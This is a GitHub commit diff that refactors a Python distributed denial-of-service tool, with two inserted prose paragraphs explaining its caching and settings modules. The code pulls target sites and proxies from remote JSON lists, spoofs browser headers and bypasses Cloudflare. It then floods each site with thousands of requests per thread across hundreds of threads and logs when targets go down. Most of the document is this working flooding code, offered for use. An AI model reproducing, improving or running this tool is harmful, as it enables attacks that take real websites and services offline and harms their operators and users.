Merge pull request AlexTrushkovsky#42 from AlexTrushkovsky/optimized
Optimized
AlexTrushkovsky authored Mar 1, 2022
2 parents b508401 + c38e6d3 commit 65ae960
Showing 4 changed files with 123 additions and 64 deletions.
5 changes: 5 additions & 0 deletions .gitignore
@@ -0,0 +1,5 @@
.idea/
venv/
build/
dist/
__pycache__/
64 changes: 64 additions & 0 deletions RemoteProvider.py
@@ -0,0 +1,64 @@
import time
import json
import cloudscraper
from functools import lru_cache
from random import choice
from urllib.parse import unquote

import settings


class RemoteProvider:
def __init__(self, targets=None):
self.targets = [unquote(target) for target in targets] if targets else None
self._proxies = []
self.sites = []
self.scraper = cloudscraper.create_scraper(browser=settings.BROWSER, )

def _scrap_json(self, link):
host = choice(link)
content = self.scraper.get(host).content
if content:
try:
data = json.loads(content)
return data
except json.decoder.JSONDecodeError:
raise Exception('Host {} has invalid format'.format(host))
except Exception:
raise Exception('Unexpected error. Host {}'.format(host))
else:
raise Exception('Unexpected error. Host {}'.format(host))

def _get_ttl_hash(seconds=settings.TARGET_UPDATE_RATE):
"""Return the same value within `seconds` time period"""
return round(time.time() / seconds)

@lru_cache()
def get_target_site(self, ttl_hash=_get_ttl_hash()):
del ttl_hash
if self.targets:
self.sites = self.targets
else:
try:
data = self._scrap_json(settings.SITES_HOSTS)
self.sites = []
for site in data:
if 'attack' not in site or ('attack' in site and not site['attack'] == 0):
if not site['page'].startswith('http'):
site['page'] = "https://" + site['page']
self.sites.append(unquote(site['page']))
except Exception as e:
raise e

return choice(self.sites)

@lru_cache()
def get_proxies(self, ttl_hash=_get_ttl_hash()):
del ttl_hash
try:
data = self._scrap_json(settings.PROXIES_HOSTS)
self._proxies = data
except Exception as e:
raise e

return self._proxies
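
For context on the two cached getters above: they use a common workaround for giving functools.lru_cache a time-to-live. An extra ttl_hash argument derived from round(time.time() / TARGET_UPDATE_RATE) keeps the same value within one update window, so cached results are reused until the window rolls over and the changed argument forces a fresh fetch. A minimal sketch of the pattern, separate from the diff and with illustrative names (fetch_targets and UPDATE_RATE are hypothetical stand-ins):

import time
from functools import lru_cache

UPDATE_RATE = 600  # seconds; mirrors the role of settings.TARGET_UPDATE_RATE


def get_ttl_hash(seconds=UPDATE_RATE):
    """Return the same value within each `seconds`-long window."""
    return round(time.time() / seconds)


@lru_cache()
def fetch_targets(ttl_hash=None):
    del ttl_hash  # only present to roll the cache key over between windows
    return ["https://example.com"]  # stand-in for a remote fetch


# Callers pass the current hash; within one window the cached list is reused.
targets = fetch_targets(ttl_hash=get_ttl_hash())

Note that the sketch computes the hash at call time; a default argument evaluated once at definition time would pin the cache key permanently.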
106 changes: 42 additions & 64 deletions attack.py
@@ -1,42 +1,28 @@
import json
import os
import platform
import sys

from argparse import ArgumentParser
from concurrent.futures import ThreadPoolExecutor, as_completed
from gc import collect
from os import system
from random import choice
from sys import stderr
from threading import Thread
from time import sleep
from urllib.parse import unquote

import cloudscraper
from loguru import logger
from pyuseragents import random as random_useragent
from requests.exceptions import ConnectionError
from urllib3 import disable_warnings

VERSION = 7
HOSTS = ["http://65.108.20.65"]
MAX_REQUESTS = 5000
SUPPORTED_PLATFORMS = {
'linux': 'Linux'
}
import settings
from RemoteProvider import RemoteProvider

disable_warnings()


def clear():
if platform.system() == "Linux":
return system('clear')
else:
return system('cls')


parser = ArgumentParser()
parser.add_argument('threads', nargs='?', default=500)
parser.add_argument('threads', nargs='?', default=settings.DEFAULT_THREADS)
parser.add_argument("-n", "--no-clear", dest="no_clear", action='store_true')
parser.add_argument("-p", "--proxy-view", dest="proxy_view", action='store_true')
parser.add_argument("-t", "--targets", dest="targets", nargs='+', default=[])
@@ -51,7 +37,7 @@ def clear():
no_clear = args.no_clear
proxy_view = args.proxy_view

targets = args.targets
remoteProvider = RemoteProvider(args.targets)
threads = int(args.threads)

logger.remove()
@@ -65,100 +51,85 @@ def clear():
<cyan>{line}</cyan> - <white>{message}</white>",
level="SUCCESS")

def checkReq():

def check_req():
os.system("python3 -m pip install -r requirements.txt")
os.system("python -m pip install -r requirements.txt")
os.system("pip install -r requirements.txt")
os.system("pip3 install -r requirements.txt")


def checkUpdate():

def check_update():
logger.info("Checking Updates...")
updateScraper = cloudscraper.create_scraper(
browser={'browser': 'firefox', 'platform': 'android', 'mobile': True},)
url = "https://gist.githubusercontent.com/AlexTrushkovsky/041d6e2ee27472a69abcb1b2bf90ed4d/raw/nowarversion.json"
update_scraper = cloudscraper.create_scraper(
browser=settings.BROWSER, )
try:
content = updateScraper.get(url).content
content = update_scraper.get(settings.UPDATE_URL).content
if content:
data = json.loads(content)
new_version = data["version"]
logger.info("Version: ", new_version)
if int(new_version) > int(VERSION):
if int(new_version) > int(settings.VERSION):
logger.info("New version Available")
os.system("python updater.py " + str(threads))
os.system("python3 updater.py " + str(threads))
exit()
else:
sleep(5)
checkUpdate()
check_update()
except:
sleep(5)
checkUpdate()
check_update()


def mainth():
result = 'processing'
scraper = cloudscraper.create_scraper(
browser={'browser': 'firefox', 'platform': 'android', 'mobile': True},)
scraper.headers.update({'Content-Type': 'application/json', 'cf-visitor': 'https', 'User-Agent': random_useragent(), 'Connection': 'keep-alive',
'Accept': 'application/json, text/plain, */*', 'Accept-Language': 'ru', 'x-forwarded-proto': 'https', 'Accept-Encoding': 'gzip, deflate, br'})
browser=settings.BROWSER, )
scraper.headers.update(
{'Content-Type': 'application/json', 'cf-visitor': 'https', 'User-Agent': random_useragent(),
'Connection': 'keep-alive',
'Accept': 'application/json, text/plain, */*', 'Accept-Language': 'ru', 'x-forwarded-proto': 'https',
'Accept-Encoding': 'gzip, deflate, br'})

while True:
scraper = cloudscraper.create_scraper(
browser={'browser': 'firefox', 'platform': 'android', 'mobile': True},)
scraper.headers.update({'Content-Type': 'application/json', 'cf-visitor': 'https', 'User-Agent': random_useragent(), 'Connection': 'keep-alive',
'Accept': 'application/json, text/plain, */*', 'Accept-Language': 'ru', 'x-forwarded-proto': 'https', 'Accept-Encoding': 'gzip, deflate, br'})
logger.info("GET RESOURCES FOR ATTACK")
host = choice(HOSTS)
content = scraper.get(host).content
if content:
try:
data = json.loads(content)
except json.decoder.JSONDecodeError:
logger.info('Host {} has invalid format'.format(host))
sleep(5)
continue
except Exception:
logger.exception('Unexpected error. Host {}'.format(host))
sleep(5)
continue
else:
try:
site = remoteProvider.get_target_site()
except Exception as e:
logger.exception(e)
sleep(5)
continue

site = unquote(choice(targets) if targets else data['site']['page'])
logger.info("STARTING ATTACK TO " + site)
logger.info("STARTING ATTACK ON " + data['site']['page'])
site = unquote(data['site']['page'])
if site.startswith('http') == False:
site = "https://" + site

attacks_number = 0

try:
attack = scraper.get(site, timeout=10)
attack = scraper.get(site, timeout=settings.READ_TIMEOUT)

if attack.status_code >= 302:
for proxy in data['proxy']:
for proxy in remoteProvider.get_proxies():
if proxy_view:
logger.info('USING PROXY:' + proxy["ip"] +" "+ proxy["auth"])
logger.info('USING PROXY:' + proxy["ip"] + " " + proxy["auth"])
scraper.proxies.update(
{'http': f'{proxy["ip"]}://{proxy["auth"]}', 'https': f'{proxy["ip"]}://{proxy["auth"]}'})
response = scraper.get(site)
if response.status_code >= 200 and response.status_code <= 302:
for i in range(MAX_REQUESTS):
if 200 <= response.status_code <= 302:
for i in range(settings.MAX_REQUESTS):
response = scraper.get(site, timeout=10)
attacks_number += 1
logger.info("ATTACKED; RESPONSE CODE: " +
str(response.status_code))
else:
for i in range(MAX_REQUESTS):
for i in range(settings.MAX_REQUESTS):
response = scraper.get(site, timeout=10)
attacks_number += 1
logger.info("ATTACKED; RESPONSE CODE: " +
str(response.status_code))
if attacks_number > 0:
logger.success("SUCCESSFUL ATTACKS on" + site + ": " + str(attacks_number))
logger.success("SUCCESSFUL ATTACKS on " + site + ": " + str(attacks_number))
except ConnectionError as exc:
logger.success(f"{site} is down: {exc}")
except Exception as exc:
@@ -169,10 +140,17 @@ def mainth():
return result, site


def clear():
if platform.system() == "Linux":
return system('clear')
else:
return system('cls')


def cleaner():
while True:
sleep(60)
checkUpdate()
check_update()

if not no_clear:
clear()
Expand All @@ -182,8 +160,8 @@ def cleaner():
if __name__ == '__main__':
if not no_clear:
clear()
checkReq()
checkUpdate()
check_req()
check_update()
Thread(target=cleaner, daemon=True).start()

with ThreadPoolExecutor(max_workers=threads) as executor:
12 changes: 12 additions & 0 deletions settings.py
@@ -0,0 +1,12 @@
VERSION = 7
SITES_HOSTS = ["https://raw.githubusercontent.com/opengs/uashieldtargets/master/sites.json"]
PROXIES_HOSTS = ["https://raw.githubusercontent.com/opengs/uashieldtargets/master/proxy.json"]
MAX_REQUESTS = 5000
DEFAULT_THREADS = 500
TARGET_UPDATE_RATE = 600
READ_TIMEOUT = 10
SUPPORTED_PLATFORMS = {
'linux': 'Linux'
}
UPDATE_URL = "https://gist.githubusercontent.com/AlexTrushkovsky/041d6e2ee27472a69abcb1b2bf90ed4d/raw/nowarversion.json"
BROWSER = {'browser': 'firefox', 'platform': 'android', 'mobile': True}
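
The new settings module is the single place the refactored attack.py and RemoteProvider read their constants from. A short, hedged usage sketch of the provider API introduced in this commit (the example target URL is made up; behaviour follows the code in the diff above):

from RemoteProvider import RemoteProvider

# Explicit targets bypass the remote sites.json lookup; they are unquoted in __init__.
provider = RemoteProvider(targets=["https%3A%2F%2Fexample.com"])
site = provider.get_target_site()   # -> "https://example.com"

# Without explicit targets, sites and proxies come from settings.SITES_HOSTS /
# settings.PROXIES_HOSTS, cached until the TTL hash window rolls over.
provider = RemoteProvider()
proxies = provider.get_proxies()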
